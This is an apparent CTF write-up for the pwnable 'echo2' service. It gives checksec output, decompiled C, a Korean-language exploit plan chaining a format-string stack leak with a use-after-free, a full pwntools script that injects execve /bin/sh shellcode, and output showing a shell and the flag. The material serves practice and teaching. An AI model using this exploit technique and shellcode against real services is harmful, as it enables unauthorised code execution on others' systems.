Pwn this echo service.
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Running at : nc 9011
ubuntu@wh1te4ever-main:~/Desktop/$ checksec ./echo2 [*] '/home/ubuntu/Desktop/' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments
int __fastcall main(int argc, const char **argv, const char **envp) { _QWORD *v3; // rax unsigned int i; // [rsp+Ch] [rbp-24h] BYREF __int64 v6[4]; // [rsp+10h] [rbp-20h] BYREF setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1, 0LL); o = malloc(0x28uLL); *((_QWORD *)o + 3) = greetings; *((_QWORD *)o + 4) = byebye; printf("hey, what's your name? : "); __isoc99_scanf("%24s", v6); v3 = o; *(_QWORD *)o = v6[0]; v3[1] = v6[1]; v3[2] = v6[2]; id = v6[0]; getchar(); func[0] = (__int64)echo1; qword_602088 = (__int64)echo2; qword_602090 = (__int64)echo3; for ( i = 0; i != 121; i = getchar() ) { while ( 1 ) { while ( 1 ) { puts("\n- select echo type -"); puts("- 1. : BOF echo"); puts("- 2. : FSB echo"); puts("- 3. : UAF echo"); puts("- 4. : exit"); printf("> "); __isoc99_scanf("%d", &i); getchar(); if ( i > 3 ) break; ((void (*)(void))func[i - 1])(); } if ( i == 4 ) break; puts("invalid menu"); } cleanup(); printf("Are you sure you want to exit? (y/n)"); } puts("bye"); return 0; }
int echo1() { return puts("not supported"); }
__int64 echo2() { char format[32]; // [rsp+0h] [rbp-20h] BYREF (*((void (__fastcall **)(void *))o + 3))(o); get_input(format, 32LL); printf(format); (*((void (__fastcall **)(void *))o + 4))(o); return 0LL; }
__int64 echo3() { char *s; // [rsp+8h] [rbp-8h] (*((void (__fastcall **)(void *))o + 3))(o); s = (char *)malloc(32uLL); get_input(s, 32LL); puts(s); free(s); (*((void (__fastcall **)(void *))o + 4))(o); return 0LL; }
void cleanup() { free(o); }
1. main 함수의 v6 지역변수에 쉘코드 삽입
2. echo2 함수를 통해 스택 주소를 leak하여 main 함수의 v6 지역변수의 주소값 획득
3. (여기서부터 UAF trigger 시작) cleanup 함수를 통해 main 함수의 o 변수를 free
4. echo3 함수를 통해 o 변수에 있던 메모리 주소를 다시한번 더 use하여,
greetings 함수주소가 적힌 주소에다가 아까 leak하여 획득하면서 획득했던 v6 지역변수의 주소값으로 덮어쓴다.
5. 이제 greetings 함수는 더이상 호출되지 않고 쉘코드가 실행된다.
from pwn import * #context.log_level = 'debug' context(arch='amd64', os='linux') warnings.filterwarnings('ignore') p = remote("", 9011) #p = process("./echo2") e = ELF('./echo2', checksec=False) # shellcode = b'\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05' p.sendlineafter(b"hey, what's your name? : ", shellcode) p.sendlineafter(b"> ", b"2") p.sendline(b'%9$p') p.recvline() leaked_stack = p.recvline().split(b'\n')[0] leaked_stack = int(leaked_stack, 16) success(f"leaked_stack: {hex(leaked_stack)}") p.sendline(b"4") p.sendline(b"n") p.sendlineafter(b"> ", b"3") p.sendline(b'C'*24 + p64(leaked_stack - 0x20)) p.interactive()
ubuntu@wh1te4ever-main:~/Desktop/$ python3 [+] Opening connection to on port 9011: Done [+] leaked_stack: 0x7ffd8af398f0 [*] Switching to interactive mode Are you sure you want to exit? (y/n) - select echo type - - 1. : BOF echo - 2. : FSB echo - 3. : UAF echo - 4. : exit > hello CCCCCCCCCCCCCCCCCCCCCCCCИ\xf3\x8a\xfd goodbye - select echo type - - 1. : BOF echo - 2. : FSB echo - 3. : UAF echo - 4. : exit > $ ls echo2 flag log $ cat flag fun_with_UAF_and_FSB :) $ [*] Interrupted [*] Closed connection to port 9011